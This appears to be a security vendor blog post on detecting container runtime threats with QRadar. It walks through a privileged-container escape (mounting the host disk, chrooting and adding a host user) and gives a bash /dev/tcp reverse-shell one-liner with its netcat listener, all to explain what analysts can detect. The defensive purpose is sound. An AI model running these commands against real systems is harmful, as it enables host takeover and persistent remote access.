Containers are an operating system virtualisation technology used to package applications and their dependencies so that it can run anywhere. "write once, run anywhere."
With more and more production containers and services being deployed into cloud environments, the threat landscape has been evolved. Security analysts need to be aware of different threats targeting the containers landscape, especially during its run time, and how an adversary can break or escape the container to control the host operating system.
Container Runtime Security
One of the main techniques to detect if a container will be compromised is by monitoring the container behaviour in run time. It's not enough to scan the container image, and we need to keep an eye over its behaviour during runtime.
Containers share the host kernel, which makes it a way easier to monitor the container behaviour, as we can see every process execution, network connections, and file modifications from all the containers at the host level without the need to install any agent in the containers.
Using QRadar, we can baseline the container behaviour, and notify the security analysts when the container will deviate from its intended behaviour, like:
If a container will start executing unknown, unseen or unusual processes
If a container will communicate to an unusual IPs / network CIDRs / countries, …
Or if a container will modify critical files in the host operating system
Process Creation in a container
Escaping the Container
One of the main targets for adversaries is to escape the container and escalate their privileges to control the host operating system, there are several ways to achieve it, one of them, if the compromised container is a privileged container.
Security analyst needs to keep an eye over the privileged containers as they can access the host devices if the compromised container is a privileged one, then an adversary can mount the host hard disk, and edit any file in the host operating system.
As an example, let us create the following privileged container, and let’s see how we can add a new user in the host operating system, then to SSH to the host OS using the newly added user.
## to create a privileged container:
docker run --privileged -it ubuntu bash
Detecting the creation of a Privileged Container
As the privileged container can access the host devices, let us mount the host hard disk:
mkdir /mutaz
fdisk -l
mount /dev/sda1 /mutaz
Now let's us add a new privileged user in the host OS, we can do it by directly modifying the /etc/passwd in our mounted path, or by changing the process root directory to our mounted path
chroot /mutaz /bin/bash
adduser mike
Container added a new user in the host OS
We just added a new user in the host Operating System while we are inside the container, there are many different ways to make this user a privileged one, e.g., by adding the user to a privileged group, or an easy way to do it is just by changing the user uid to be zero, which also can be detected by looking for a non-root user with a uid of zero. Also, security analysts need to keep an eye if an unusual process will modify a critical file like /etc/passwd, sysadmins and DevOps will not directly modify such a file.
Reverse Shell for Persistence
One of the ways to achieve persistence, an adversary will need to plant a reverse shell which can be done in a single command line as follows:
bash -i >& /dev/tcp/192.168.0.171/4444 0>&1
the attacker will be waiting for any incoming connection to port 4444 as following:
nc -lvp 4444
Detection of Reverse Shell
Security analysts can hunt all the above malicious activities and more using the following out of the box QRadar content pack
https://exchange.xforce.ibmcloud.com/hub/extension/03b5e623d978dfa84b339dd6d38e02d5
#QRadar